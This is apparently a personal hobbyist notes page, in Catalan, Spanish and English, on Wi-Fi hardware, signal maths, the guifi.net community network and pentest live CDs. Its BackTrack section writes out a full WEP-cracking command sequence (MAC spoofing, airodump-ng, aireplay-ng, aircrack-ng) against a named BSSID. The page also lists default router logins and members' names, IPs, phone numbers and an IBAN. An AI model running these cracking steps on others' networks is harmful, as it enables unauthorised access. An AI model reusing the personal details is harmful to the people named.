home / infca / wireless Before you judge a man, try walking in his shoes.

Arcadi | Irina | guifi | signal strength Links | End

Xarxes inalàmbriques

 
Dedicat a en Jordi Buzón.
Tú sí que sabes motivarme.
 

WiFi 9106 CN-WF511 Tech stuff Exploit CD WiFi vs BT Mobils

Entorn WiFi

Amunt! Top Amunt!
802.11a (wiki) - The 802.11a standard uses the same core protocol as the original standard (ratified in 1999), operates in 5 GHz band, and uses a 52-subcarrier orthogonal frequency-division multiplexing (OFDM) with a maximum raw data rate of 54 Mbit/s, which yields realistic net achievable throughput in the mid-20 Mbit/s.

Using the 5 GHz band gives 802.11a a significant advantage, since the 2.4 GHz band is heavily used to the point of being crowded. Degradation caused by such conflicts can cause frequent dropped connections and degradation of service. However, this high carrier frequency also brings a slight disadvantage: the effective overall range of 802.11a is slightly less than that of 802.11b/g; 802.11a signals cannot penetrate as far as those for 802.11b because they are absorbed more readily by walls and other solid objects in their path.

Wi-Fi (Wireless Fidelity) standard
Norma : 802.11b (1091 K) 802.11a is used by OTAN in Europe.
Arquitectura : Get all 802 !
Frequency band : 2,400 - 2,4835 GHz (Industrial Scientific Medical Band).
Legislación española : ver S5.150 en S5_1.doc de Sección III : disposición del cuadro de atribución de bandas de frecuencias. Channel 10-11 (Spain).

 f (bottom of band) = 2,4 GHz => λ = 12,5 cm.
 f (top of band) = 2,4835 GHz => λ = 12,08 cm.

A common design for antennas is to make them 1/4 of a wavelength or less in length.

2,462 GHz is channel 11
Velicitat de transferència : 11 Mbps
Radio type : frequency hopping spread spectrum (FHSS)
Modulation : QFSK, BFSK, DBPSK
Hardware comparisons : Seattle
Receive sensitivity : FreeNetworks
Atenció a la seguretat : el AirSnort crakeja les claus d'encriptació ! I el WEPCrack !

ExtremeTech diu :

 WEP (wired-equivalent privacy) = encryption scheme for wireless traffic.
 Tools are readily available to break 40-bit WEP in a few minutes, and 128-bit WEP keys can be broken in a few days.

El AiroPeek (protocol analyzer) preten arreglar-ho.

IBM diu

Existing security for 802.11 wireless consists of two subsystems :
a data encryption technique called Wired Equivalent Privacy (WEP) and an authentication method, either Shared Key or 802.1x.
Both the encryption and authentication are optional, and wireless access points are typically shipped with both turned off.

I té el DWSA
Un article amb els esencials de la seguretat WiFi casolana.

WEP security

New WEP cracking tools : WEP.HTM

"WPA Cracking" ... "128 Bit WEP cracking" here "The minimum number of characters for a WPA-PSK passphrase is 8. The maximum is 63."

Chez moi :

SSID    Security Type  Encryption   Cipher   Aut   Radio Type
------  -------------- -----------  -----    ----  -----------
belkin  WPA2           AES          CCMP     PSK   802.11n
        WPA            TKIP                  PSK   802.11g

 

 

Servidors (Access Point)

 

 

 

Clients : wireless card, tarjes Wi-Fi (802.11b)

  • Lucent

  • Orinoco (15 dbm power output)

  • Apple Airport

  • Cisco

  • Linksys

  • D-Link : DWL-650 PCMCIA is cheap and has Linux support

  • Edimax
    • PCMCIA
      • EW-7102PC = Wireless LAN PCMCIA adapter (*linux*)
      • EW-7103PC = Wireless LAN PCMCIA adapter (*linux*)
    • USB
      • EW-7112U = Wireless LAN USB adapter
      • EW-7115U = Wireless LAN USB adapter
    • PCI
      • EW-7122 = Wireless LAN PCI adapter (*linux*)
      • EW-7123 = Wireless LAN PCI adapter

  • Surecom
    • PC Card : EP-9427
    • USB Card : EP-9001

  • En Jordi te una PCMCIA Edimax, EW-7102 PC
    A Edimax seccio "products" + "wireless" :
    • EW-7103 PC : pcmcia wireless network adapter, 12 dBm output power (typ), -80 dBm receiver sensitivity (min). Coverage area : closed space (25m).
    • EW-7123 PC : pci wireless network adapter
    • EW-7205 AP : access point. Data packet bridging between wireless network (802.11b) and Ethernet network (802.3). Operating range : open space (100-300m), indoor (35-100m).
    Per les WS amb USB, en Jordi té una Edimax 7115-U

  • En Bulma recomana Conceptronic.
    Ep : a BCN es troba a Pricoinsa & JUMP (IE only) [Rda Sn Antoni, 38] & FNAC
    La Conceptronic PCI C11iDT porta una antena exterior !

  • A Seattle recomanen Lucent Silver/Gold (Hermes chipset)
    On the Prism chipset, ther's a lot of manufacturers.

  • Araceli has a Conceptronic Wireless 54Mbps adaptador USB

  • SAG has a wifi card !

  • A wifi dongle is a common name for a wireless USB adapter, which is the same thing as a WiFi card except it uses a USB interface instead of PCI or PCIe.

  • Monitor mode is one of the six modes that 802.11 wireless cards can operate in:
    • Master (acting as an access point),
    • Managed (client, also known as station),
    • Ad-hoc,
    • Mesh,
    • Repeater,
    • and Monitor mode

    Mes detall {wireless.kernel.org}

 

 

 

Edimax EW-7115U

  • Library : Transmit power = 15 dBm, Receive sensitivity = -80 dBm.
  • datasheet or PDF
  • Torrelles :
    2 WS s'han conectat quan hem posat "AdHoc" + (E)SSID
  • W2K :
    • Install under W2k :
      do not plug the USB adapter until the Application setup has been completed
      To install the drivers and the "Configuration & Monitor utility", run setup.exe from the CD.
    • Uninstall under W2k :
      • to remove the "Monitor & Configuration utility", select "Uninstall Configuration & Monitor utility" option (Start -> Programs -> Amter 802.11 Wireless LAN). It is recommended to stop the USB adapter and "Exit" the application !
      • to uninstall the USB adapter, select it in the Device Manager, and press "Uninstall" - can be performed only if the USB adapter is plugged in
  • Linux + USB : Atmel AT76C503 based wireless USB devices. VID=0x03EB, PID=0x7603, MAC=AT6C503A, Radio=RFMD (not Intersil).
    Another similar (identical) place
    How to build and install the GPL drivers.
    Another HowTo.
    SuSE 8.0 (and more) specifics (config).


US Robotics 9106

Amunt! Top Amunt!

 

9106 Specifications [url]

    * Network address translation (NAT)
    * Integrated 802.11g (54Mbps) wireless access point
          o 54Mbps data rate with auto fallback
          o 2 x detachable 2 dBi reverse SMA antennas
          o Support for WEP and WPA-PSK
          o Mac address filtering
          o Disable SSID
    * Integrated ADSL modem - 1 x RJ11 connection - velocitat ?
    * 4 x 10/100Base-T auto MDI-MDIX RJ45 switched LAN ports
    * Built-in firewall with stateful packet inspection (SPI)
    * Integrated DHCP server
    * Virtual private network (VPN) pass-through
    * UPnP enabled
    * DMZ hosting and port forwarding
    * Web-based & remote configuration
    * 2 year manufacturer warranty
 

Homepage

Search for FLOW CONTROL

 El modelo del ADSL Wireless Gateway
 Model 9106 ¢ USR209106
 SN:1DAH2A3D0439

Amunt! Top Amunt!
My Wifi cards & routers
P4 / Airis : Canyon CN-WF511

Chipset & driver by fabricante : url

Mine : URL

Norma = 802.11g, ID del producto = CN-WF511, Interface = PCI, Chipset = Ralink (chip RT2560F), Driver = rt2x00, Trabaja con Linux = verde.

Comentarios - driver available from manufacturer: http://web.ralinktech.com/ralink/Home/Support/Linux.html
=> http://rt2400.sourceforge.net/
=> http://rt2x00.serialmonkey.com, or http://sourceforge.net/projects/rt2400.

3 fotos :


T42

Ubuntu lspci says : Intel Corp. PRO/Wireless 2200 BG (rev 05)
So, it is a IPW2200 BG card

Norma = 802.11g, ID del producto = 2200BG, Vendedor y código del producto = man:8086 dev:4220, Interface = mini-PCI, Chipset = IPW2200, Driver = ipw2200, Trabaja con Linux = verde
Comentarios : http://ipw2200.sourceforge.net/

[t42:\Fonts\WireLess\Drivers\T42]


T400 (Abr 2010)
Integrated card

XP says : Intel(R) WiFi Link 5100 AGN ; mac = 00:22:FA:D1:5A:90 ; driver = NETw5x32.sys ;

AIR-PCM352 (pcmcia)

XP says : "Cisco Systems 350 Series PCMCIA Wireless Adapter : driver = pcx500.sys ;
soft, download.

Belkin Play N600, model F7D4101v2 (Oct 2014)

Play N600 USB Wireless N Dual Band.

Help (Spain) : 902.02 43 66

ISO (146 MB)

MTV, 201512 : Comtrend

5813 foto, manual [default 192.168.1.1, "1234"]

Portal Alejandra

Admin pwd
100 Mbps

“Wireless -> Advanced“, cambiamos :

url

MTV, 201601 : HUAWEI ONT HG 8240

El Echo Life HG8240 es un terminal de red óptica (ONT) para interiores de la solución FTTH Huawei. Con el uso de la tecnología GPON, ofrece acceso de banda ultra-ancha para usuarios residenciales y pequeñas empresas. Proporciona dos puertos POTS y cuatro puertos Ethernet GE/FE de adaptación automática.

Homepage

Fibra Optica

Tech stuff

Amunt! Top Amunt!
  • Free Networks
  • dB = 10 * log(a/b) ; 'a' and 'b' is power in mW
  • dBm = 10 * log(P) ; for dBm, 'b' is 1 mW.
  • a dBm is power level referenced to 1 milliwat => 0dBm = 1 mW.
  • 1 W => 10 log 1000 mW / 1 mW = 10 log 1000 = 10 * 3 = +30 dBm
  • 100 mW = +20 dBm
  • 10 mW = +10 dBm
  • doubling the power increases the reading by slightly more than 3 decibels, actually close to 3.010299 dB : 10 * log(base 10) 2 = 3,01029995664
  • 3 dBm + 3 dB = 6 dBm ( 2 mW * 2 = 4 mW )
  • 3 dBm - 3 dBm = 0 dB ( 2 mW / 2 mW = 1 )
  • mW to dBm
  • dBm to mW

 

 

  dBm  
+ 3dB     log
  mW  
x 2     log
0 1
3 2
6 4
9 8
10 10
12 16
15 32
18 64
20 100
21 128
24 256
27 512
30 1024
30 1000

 

 

Pèrdua de senyal a l'espai lliure :

  Loss = 32 + 20 x Log ( F x D ) 
  where
 Loss = free space path loss in dB
 F = operating frequency in Mhz
 D = distance in Km
 Include a fade margin of about 10 dB ...
So for a simple example, how far can a pair of Wavelan cards get with the little supplied patch antennas of 8 dbi ? The answer is :
 Tx power = + 20 dbm
 Combined antenna gains = 16 ( 8 + 8 )
 Rx sensitivity = -74 dbm
 Total link budget = 20 + 16 - ( -74 ) = 110 db
 Max distance = 4 km aprox

 loss = 32 + 20 x log (2450 x 4) = 111.

 With 10 dB margin we have :

    100 dB > 32 + 20 x log ( 2450 x d )
     68/20 > log ( 2450 x d )
     10 exp (68/20) / 2450 > d
     d < 1,025 Km
Bluetooth uses 1mW to reach 10 m [verify]

 

Vocabulari

  • Wlan Primer and FAQs

    Every device (wireless card) in an 802.11 network is known as a station (abbreviated STA). A collection of stations that communicate with each other is known as a Basic Service Set (BSS), which covers a certian Basic Service Area (BSA). Stations that are not within the BSA can't directly participate in a BSS with each other.
    When stations are participating in a BSS, they share a common set of network parameters. They all transmit/receive on the same channel, they understand the same data rates, they use a common BSSID, and they are synchronized to the same timer. In a BSS, all of those parameters are broadcast in beacon frames that are sent at a regular interval.
    Two BSS's could coincidentally share the same channel, common data rates, and timer, so some unique identifier is necessary. That unique identifier is a 6-byte number that identifies the BSS (the BSSID). Packets in a BSS, in addition to being addressed from one station to another, also include the BSSID.
    There are two kinds of BSS's: the independent BSS (IBSS) and the infrastructure BSS.
    An IBSS is usually an ad-hoc network, and they're meant for peer-to-peer networking. An IBSS resembles a bunch of computers on the same Ethernet segment--they can all hear each other, and packets are sent directly to the recipient. In an IBSS, all of the stations are responsible for sending beacons, and the BSSID is randomly generated.
    In an infrastructure BSS, there is exactly one access point (AP). When one station wishes to send data to another station, the packet is sent first to the AP, and then the AP delivers the packet. The BSSID of an infrastructure BSS is the MAC address of the AP's station interface, and the AP is the only station that sends out beacons. The AP is sometimes known as the BSS master, and the other stations are BSS clients.
    802.11 networks grow by combining infrastructure BSS's into larger Extended Service Sets (ESS's), which cover Extended Service Areas (ESA's). In order for stations in one BSS to talk to stations in other BSS's, the stations must take advantage of distribution system services (DSS). The distribution system (DS) is the magical thing that connects BSS's into one ESS, and it's defined by the services that AP's connected to the DS provide.

  • SSID = Service Set Identifier.
    32-byte string that identifies an IBSS or an ESS (or a single infrastructure BSS). It's often called the network name or ESSID. The SSID is a unique ID given to the Access Point.
    Wireless clients associating to any Access Point must have the same SSID. Alternatively, "ANY" (all characters in upper case) may be used.
    BSSID - basestation ID. (Access Point MAC address)

  • Infrastructure = with Access Point, AdHoc = without Access Point.

    In Ad-Hoc mode : Ad-Hoc network is a group of computers, each with a WLAN adapter, connected as an independent wireless LAN. All stations in the WLAN should set the same ESSID and operation channel. Each node (station) acts as a router for the other nodes. See Snoop
    In Infrastructure mode : an integrated wireless and wired LAN is called an Infrastructure configuration. Set the ESSID to be the same with the AP you associate to.

  • RTS threshold - mechanism implemented to prevent the "hidden node" problem.
    A packet size is specified, and the RTS/CTS mechanism will be activated if the packet size exceeds the specified value.

  • pigtail - cable (corto, flexible) que tiene en un extremo un conector N para enroscar la antena, y en el otro extremo un conector específico que se acoplará en nuestro hardware wireless. Few pictures



Get a packet monitoring tool for wireless LAN


See Sniffer 4.6 [12 dolars]
AirMagnet Duo complementing Sniffer Wireless article
And Snort [for W2K]
Here is a wireless kismet scanner (requires driver in promiscous mode) Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.
Windows ones :
  • SpyNet sniffer : CaptureNet v3.12 + PeepNet => "Iris" Network Traffic Analyzer
  • CommView v2.0 sniffer
Read about Anti-Sniff. Also about packets and protocols ! Even points to GG243376 !
In Win2000Mag also ! [NT only !]
 AntiSniff exploits the method NT uses to handle packets by sending a packet to the system
 using an Ethernet address of FF:00:00:00:00:00
 and the IP destination address of the system you want to check.
 When a network card is operating in promiscuous mode in NT,
 it will respond to the packet that AntiSniff has sent,
 revealing that a packet sniffer might be active on the system.

 For its DNS tests, AntiSniff puts itself in promiscuous mode
 and sends a packet out on the network using a predetermined IP address
 in the packet header. If a packet sniffer is listening on the network
 and configured_as some are_to perform reverse
 DNS lookups for the packets it captures, then the system running the
 packet sniffer will transmit a reverse DNS lookup request for the IP
 address in the packet AntiSniff sent.
 The product captures that particular action (the reverse DNS lookup),
 tricking the packet sniffer into revealing itself on the network.

Other network analyzers :

List of sniffers : http://www.packetattack.com/wireless.html - and more ! [*****]

War driving : MacStumbler (Airport wireless cards only)

Read WEP


 

Auditor Security Collection

From here
BackTrack is the result of the merging of the two innovative penetration testing live linux distributions Auditor security collection and Whax. : BackTrack download : v3 Beta - 14-12-2007, v4 bt4-beta.iso 02/2009. 2010 new home : http://www.backtrack-linux.org/.

See also WifiSlax (v 3.1, 683 MB, at 2007/12 has kernel 2.6.21.5, meaning no "iwlagn" for T400), KisMet, Stumbler (guindous). Nice Blog.

Centuriones !

Kernel := 2.6.6 ! [10/01/2005]
MacChanger :

     -s eth0 => 00.02.8A.3C.31.4F
     -s eth1 => 00.09.6B.86.5C.57
     -m => provide New AA.BB.CC.DD.EE.FF

Auditor-200605-02 : !IMPORTANT!!
This version has two different ISO versions, becasue the Intel B and the Intel B/G card drivers IPW2100 and IPW2200 does not work well in cooperation. While B cards does not seem to have a problem, systems with B/G cards (ipw2200) seemed to hang during boot. To overcome this problem (until the drivers are fixed) we release two iso's of the CD to support your needs. If you want to be able to use Auditor Security Collection on a system with an IPW2200 card you need to download the "-no-ipw2100" version of the iso otherwise it will not boot. A system with B card based on IPW2100 will work with it, but no driver will be loaded for the B only card. If you never run it on a System with IPW2200 take the "ipw2100" version, the ipw2100 driver is included in this version.

List of tools.
Device list
Tutorials

BT4

Homepage : http://www.backtrack-linux.org/, but drac is from Legacy Filmworks ! (2014) -> Kali

To start BT4 :

  • network : /etc/init.d/networking start ;
  • KDE : startx ;
  • FVWM : bt4-crystal ;
Eines al BT4

Les utilitats que hi ha al BT4 son :

aircrack-ng - airmon-ng - AirSnarf - ASLEAP - Automated LEAP attack tool- tool to Crack Cisco LEAP, August, 2003. SourceForge. Cowpatty - Genpmk - Kismet - Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. url MacChanger -
wifi cards

To display card manufacturer to Linux driver compliance : http://linux-wless.passys.nl/.
How to display vendor &: product code :

# lspci -vv | grep Intel {for a PCI card : read here} 00:0b.0 Network controller: Intel Corporation PRO/Wireless 2200BG (rev 05) Subsystem: Intel Corporation: Unknown device 2702 Now, look for the device number: # lspci -n | grep 00:0b.0 00:0b.0 Class 0280: 8086:4220 (rev 05)
Acradi Acer Aspire 5741
$ lspci 03:00.0 Network controller : Broadcom Corporation device 4357 (rev 01) Subsystem : Foxconn International Inc, device E021 Kernel drive in use : wl # lspci -n | grep 03:00.0 03:00.0 0280: 14e4:4357 (rev 01)

BCM page has move to b43 driver page.

When booting BT4, I find

$ cat /var/log/messages | grep Broadcom bt kernel: eth0: Broadcom BCM4357 802.11 Wireless Controller 5.10.91.9

Also I find
$ iwconfig eth0 IEEE802.11bgn ESSID:"" Nickname:"" Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated

No permet ficar-se en mode tafaner :
$ iwconfig eth0 mode monitor SET failed on device eth0: invalid argument.

Pero si es pot configurar si sabem la clau :
$ iwconfig eth0 mode managed
Irina Acer Aspire 6930
$ lspci 07:00.0 Network controller : Intel Corporation, Wireless WiFi Link 5100 Kernel drive in use : iwlagn Kernel modules : iwlagn $ lspci -n | grep 07:00.0 07:00.0 0280: 8086:4232

ipw5100 uses iwlagn driver : green, wlan type := 802.11a/n, vendor & product code := man: 8086 dev: 4237, mini-PCIe.

Al log trobo :

$ cat /var/log/messages bt kernel: iwlagn 0000:07:00.0 Detected Intel Wireless WiFi Link 5100AGN REV=0x54

El nostre device és wlan0 :

$ iwconfig wlan0 IEEE802.11abgn ESSID:"" Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated

El configurem :

$ ifconfig wlan0 down $ macchanger -m 00:11:22:33:44:55 wlan0 Current MAC: 00:21:5d:4c:3e:d0 (unknown) Faked MAC: 00:11:22:33:44:55 (Cimsys Inc) $ iwconfig wlan0 mode monitor $ ifconfig wlan0 up

Anem per feina :

$ airodump-ng wlan0 veure xarxes : WLAN_C5, ch 3, BSSID 00:19:15:4F:92:AA ; $ airodump-ng --channel 3 wlan0 veure nomes dades del canal 3 $ airodump-ng -c 3 -w test -bssid 00:19:15:4F:92:AA wlan0 esperar paquets #Data (no tancar finestra !) $ aireplay-ng -1 0 (-e WLAN_C5) -a 00:19:15:4F:92:AA -h 00:11:22:33:44:55 wlan0 do associate to router $ aireplay-ng -3 -b 00:19:15:4F:92:AA -h 00:11:22:33:44:55 wlan0 entrar pakets per a que #Data pugi mes rapid, fins 10.000 ! $ aircrack-ng -b 00:19:15:4F:92:AA test-01.cap desxifrar : wait "KEY FOUND" $ iwconfig wlan0 mode manakeg key 31:32:33:34:35:36:37:38:39:30:31:32.33 conectar al router amb la clau $ dhcpcd wlan0 get IP $ ifconfig wlan0 display configuration $ ping www.google.es use Internet ;
Misc

BT forums.


WifiSlax
  • boot CD
  • login as "root" / "toor"
  • either :
    • "startx" = engegar entorn Xwindow
    • "xconf" = configurar tarja gràfica
    • "ifconfig eth0 up" = engegar xarxa local
    • "pump" / "dhclient" = get an IP from the DHCP server
    • si hi ha problemes, mirar /var/log/messages o /var/log/syslog
  • Airis P4 : Canyon CN-WF511 Ralink RT2500 Wireless LAN Card => RT2500 chipset Driver URL ; card description ; driver download {win} ; T42:\Fonts\WireLess\Drivers\P4_Airis\rt2500-1.0.0.tar.gz
  • T42 : Intel Corp. PRO/Wireless 2200 BG (rev 05)
  • ataque fragmentación / get PRGA - Sample.
    • configurar wireless :
      iwconfig ra0 rate 1M channel 6 mode monitor
    • start airodump :
      airodump-ng --ivs -w clave -c 6 ra0


LEAP & ASLEAP

LEAP is ...

Asleap is ... - Automated LEAP attack tool. Another tool : LEAP cracker.

few links : Flim; VT - blog.


guifi.net

Guifi homepage; comun; fundació

Torrelles Google group, foro, email incidencies, e_mails, nif()
IBAN: ES47 0081 0122 2800 0113 9623 / BSAB ESBB. Quota 2016 : 40,00 € {pagat Febrer}
Si no et funciona ho dius al googlegroup i posa el IP de la teva antena. En Lorenzo s'ho va mirant. Boi tf 637.979.121

Contacte : Daniel Sanchez; Edgar, Edgar

e1001 administració Torrelles : eeeiii, Israel Antúnez@eeeiii.net, Carlos Vargas@eeeiii.net, samsitper : cementiri o campanar

Tf informació : 93.689.02.91 ; Serveis.

Guifi Baix coop

Contacta amb Interbaix, potser pot donar-vos servei: ms2k@interbaix.com, 93 654 82 08 / 09
A/At. Josep Alacid, 625 422 876 gMail Jacint Verdaguer, 144 ; Sant Boi de Llobregat ;

Torrelles, 31/07/2010 :

Network Name Signal Strength Encryption Wireless Mode Channel MAC Address guifi.net-TDLCmpnrAP4 17% Open network 802.11a 104 00:0C:42:61:A7:43 guifi.net-wds-TDLCmpnPtOmnia 44% Open network 802.11a 132 00:0C:42:3A:EB:D0 guifi.net-TDLCmpnrAP1 37% Open network 802.11a 36 00:0C:42:3A:E7:24 guifi.net-TDLCmpnrAP3 35% Open network 802.11a 44 00:0C:42:61:A5:F9

4 nodes (2010) :

Home, 20151025 :

Network Name Signal Strength Encryption Wireless Mode Channel MAC Address WLANGAS2 70% Encrypted 802.11g 9 40.4A.03.AF.5B.FB WifiLluis 68% Encrypted 802.11n 1 00.F8.1C.91.4A.DD
Internet Speed test

Eines per mesurar la velocitat : ADSL, Movistar, Speed Test, CNET, SourceForge

{201410} 8 Mbps baixada, 12 Mbps pujada
{201411} 5 Mbps baixada, 8 Mbps pujada
{20141207, 08h} 6,5 Mbps baixada, 8 Mbps pujada. Pero baixo fitxers a 300 KBps = 2,4 Mbps.
{20150814, 07:05} 5968 kbps = 746 KB/sec baixada, 8776 kbps = 1097 KB/sec pujada. Ping: 18 ms. Jitter: 24 ms.
{20151214, 07:35} 4,0 Mbps baixada, 9,7 Mbps pujada
{20160216, 07:35} 3,8 Mbps baixada, 4,0 Mbps pujada
{20160220, 12:20} 1,9 Mbps baixada, 8,6 Mbps pujada
{20160311, 07:30} 16 Mbps baixada, 12 Mbps pujada
{20160316, 21:00} 3,7 Mbps baixada, 5,7 Mbps pujada
{20160320, 22:30} 140 / 32 Mbps
{20160321, 07:50} 81 / 32 Mbps
{20160518, 09:10} 5 / 3 Mbps [FO]

esquema
[castelldefels] | [tabor] - AP1 : 10.139.130.65/27 (10.139.130.129) | | | AP2 : 10.139.238.33/27 (10.139.238.97) | | | AP3 - (10.139.238.129) | | | | | .--- [cementiri] - AP1 - 10.139.130.161 | | - AP2 - 10.139.238.161 | | | .------[CanColl] - AP1 : 10.139.130.193 | - AP2 : 10.139.130.225 | [campanar] - AP1 : 10.139.130.65/27 - [ST1] -. AP2 - 10.139.238.33 - [ST1] ---- [Punt Omnia] - 10.139.238.194 AP3 : 10.139.130.97/27 - [ST2] AP4 - 10.139.238.65 - [ST2] ---- [Ajuntament] - 10.139.130.34 CanCollTabor 172.25.32.89/30 CanColl-guifiGy 172.25.39.106/30 CmpnAjuntmnt 172.25.39.42/30 CampanarST2 172.25.39.46/30
ruta cap l'exterior
c:\> tracert -d -h 20 1.2.3.4 Tracing route to 1.2.3.4 over a maximum of 20 hops 1 <1 ms <1 ms <1 ms 192.168.2.1 router.belkin 2 4 ms 4 ms 4 ms 192.168.1.1 nano 3 6 ms 5 ms 4 ms 10.139.130.65 default GW per 192.168.130.69 (my-WLAN-IP), Campanar AP1 4 5 ms 5 ms 5 ms 10.139.130.97 Campanar AP3 5 8 ms 8 ms 6 ms 172.25.66.1 MikroTik RouterOS v6.27 6 9 ms 6 ms 6 ms 172.25.51.178 MikroTik RouterOS v6.27 7 8 ms 8 ms 7 ms 192.168.4.1 MikroTik RouterOS v6.33.5 8 8 ms 8 ms 12 ms 192.168.3.1 MikroTik RouterOS v6.33.5 9 10 ms 14 ms 12 ms 80.58.67.116 116.Red-80-58-67.staticIP.rima-tde.net 10 13 ms 15 ms 16 ms 80.58.118.249 249.Red-80-58-118.staticIP.rima-tde.net 11 18 ms 17 ms 13 ms 80.58.81.50 50.Red-80-58-81.staticIP.rima-tde.net 12 12 ms 13 ms 20 ms 213.140.50.244 13 46 ms 38 ms 37 ms 5.53.6.246 xe3-0-0-0-grtpareq2.net.telefonicaglobalsolutions.com 14 113 ms 112 ms 112 ms 5.53.6.145 xe3-1-1-0-grtwaseq6.net.telefonicaglobalsolutions.com 15 115 ms 114 ms 117 ms 84.16.9.146 google-xe3-1-3-0-grtwaseq2.red.telefonica-wholesale.net 16 116 ms 114 ms 114 ms 65.210.126.78

Via Ap3 () :

c:\> tracert -d -h 20 1.2.3.4 Tracing route to 1.2.3.4 over a maximum of 30 hops 1 4 ms 5 ms 3 ms 192.168.1.1 2 6 ms 5 ms 5 ms 10.139.130.97 3 6 ms 7 ms 6 ms 172.25.66.1 4 8 ms 7 ms 7 ms 172.25.51.178 5 9 ms 9 ms 21 ms 192.168.4.1 6 * * * Request timed out. 7 * 11 ms 10 ms 80.58.67.116 8 13 ms 17 ms 12 ms 80.58.85.117 9 * * * Request timed out.

Amb Tor (???):

c:\> tracert -d -h 20 www.google.com Tracing route to www.google.com [216.58.210.164] over a maximum of 30 hops: 1 <1 ms <1 ms <1 ms 192.168.2.1 2 18 ms 5 ms 12 ms 192.168.1.1 3 27 ms 30 ms 47 ms 10.139.130.65 4 134 ms 94 ms 76 ms 10.139.130.97 5 140 ms 130 ms 117 ms 172.25.66.1 6 44 ms 14 ms 27 ms 172.25.51.178 7 45 ms 97 ms 77 ms 192.168.4.1 8 50 ms 68 ms 97 ms 192.168.3.1 9 130 ms 134 ms 112 ms 80.58.67.116 10 104 ms 107 ms * 80.58.85.117 11 108 ms 136 ms 96 ms 80.58.106.13 12 113 ms 64 ms 52 ms 176.52.253.97 13 28 ms 37 ms 64 ms 5.53.1.82 14 141 ms 102 ms 131 ms 209.85.252.150 15 71 ms 117 ms 80 ms 216.239.50.27 16 131 ms 38 ms 51 ms 216.58.210.164 Trace complete.

Des la biblioteca

c:\> tracert -d -h 20 1.2.3.4 Tracing route to 1.2.3.4 over a maximum of 30 hops 1 * * * Request timed out. 2 4 ms 2 ms 2 ms 192.168.5.1 3 3 ms 2 ms 2 ms 192.168.10.9 4 49 ms 49 ms 49 ms 80.58.67.116 5 54 ms 49 ms 51 ms 80.58.88.221 6 * * * Request timed out. 7 * * * Request timed out.
ruta des l'exterior
c:\> tracert 2.136.45.31 Tracing route to 31.Red-2-136-45.dynamicIP.rima-tde.net [2.136.45.31] over a maximum of 30 hops: 1 <1 ms <1 ms <1 ms 213.229.144.193 2 3 ms 3 ms 3 ms 212.74.84.215 3 11 ms 10 ms 10 ms te0-3-0-0-pr1.MAD.router.colt.net [212.74.87.17] 4 9 ms 9 ms 9 ms 195.95.153.1 5 20 ms 19 ms 19 ms 166.Red-80-58-106.staticIP.rima-tde.net [80.58.106.166] 6 18 ms 18 ms 18 ms 118.Red-80-58-85.staticIP.rima-tde.net [80.58.85.118] 7 20 ms 20 ms 19 ms 31.Red-2-136-45.dynamicIP.rima-tde.net [2.136.45.31] Trace complete.

No m'arriba. A veure ara :

c:\> tracert 10.139.130.69
nodes / IPs / usuaris / emails

Tots els nodes de Torrelles. Servidors DNS (10.139.130.34, 10.139.238.194 ). Servidors NTP (10.228.203.104 ). El proxy de Torrelles és el node 30627 {22900 ?}

nom / email node IP connected to dades
Sebastia Altemir 33491 NodeSebastiaNet - 10.139.130.69/27 {gw 10.139.130.65} 10.139.130.65 - Campanar AP1  
Jordi Buzon 32747 TDLfcoromines15 - 10.139.238.114/27 10.139.238.97 - Tabor AP2 distancias
Ramon Ros 77987 TDLFntdlBrc14 - 10.139.130.203/27 10.139.130.193 - Can Coll AP1  
Lluis Mabilon Martinez 32889 TDLMajor65 - 10.139.130.100/27 {gw 10.139.130.97} 10.139.130.97 - Campanar AP3 EVO-W54, router. TP-Link TL-SG108E switch
Carlos Cornella 38230 / 72720 TDL Montserrat Roig 22 - 10.139.238.143/27 / 10.139.238.141/27 10.139.238.129 - Tabor AP3  
Miguel Angel Gomez Siurana 51781 TDLMontpedros31 - 10.139.238.113/27 10.139.238.97 - Tabor AP2  
Herbolari Sajolida 79881 TDLRafaelCasanova20 - 10.139.238.116/27 10.139.130.97 - Campanar AP3 TP link
Matias Fescina 65523 nom = TDLcarrer288 / IP = 10.139.238.179 conexio = TDLLCementiri - 10.139.238.161 misc
Daniel Gonzalez Vaz-Romero
Rafael Garcia Mesas
Miguel Angel

Nodes de amics

Pere Olle. E1001 Jordi. Carles Segura.

Mele, 10.139.202.202/27

RiuMorell a RiuMar, Agusti ; a Riumar no utilizem Nanostations; utilitzem SXT 5HPnD a 5 Ghz de Mikrotik. Pots connectar-te a la xarxa amb un sencill scan desde l'antena. Forum Mikrotik.

Mario Figueres Casanova, tf 636.878.611

Node Lluis Crespo

mode "sense proxy"

Des Juny de 2014 no cal posar proxy als usuaris que paguem. Funciona el FTP de conya.

Dades del "proxy"

Proxy = proxy.torrelles.guifi.net:3128, ip=10.139.130.34. Proxy Type = HTTP {no SOCKS}. Punt Omnia = 10.139.238.194:3128. Tercer proxy : 10.138.27.163

Router Comtrend CT-536+

En Jordi em deixa un router Comtrend HG536+ o CT-536+ {nov 2010}

192.168.1.1 User: admin. Password: admin. MAC: 01:15:F2:EB:53:2B ;

Com que la NS5 agafa 192.168.1.1 ... doncs li posem 192.168.1.2 al router !
Li dones la ip per ex: 192.168.1.2 al comtrend i li poses els dns 192.168.1.1 (nano), desactives el dhcp del comtrend i deixes activat el de la nano. Despres has de anar a l'apartat quality of service del comtrend i eliminar el que hi ha, per tal de poder utilitzar els 4 ports lan, ja que dos son per iptv i hg. {ignasiferrer@guifi.net}
imatge.

Ports especials (2)
No es necesario que metas ningún firmware anterior. Simplemente has de entrar en la configuración del router > Advanced Setup > Wan y verás 2 conexiones. Deja la pppoe_8_35 y borra la otra. En cuanto salves los cambios y rebotes el router, tendrás los puertos 3 y 4 listos para funcionar con normalidad. Consejo: si haces un backup del router antes de eliminar esa conexión wan, siempre podrás restaurar el router a su punto inicial. Te lo digo por si más adelante quisieras usar tv o voip.

Router ZyXEL P660HW-D1 (timofònica)

20150106 : mac = 40.4A.03.AF.5B.FB

Per guifi:

Tron diu :
Tens de entrar per navegador en la pestanya LAN/LAN Setup/DCHP. A TCP/IP s'ha de posar 192.168.1.2 amb la mascara 255.255.255.0, la seguent opció en "Both", la de sota en "RIP-2B" i la última en "IGMP-v2".

Firmware original (no "capat" per tfca) : pàgina del fabricant.

Reset to factory settings

With the router powered on, push "Reset" micro-button for about 30 seconds.

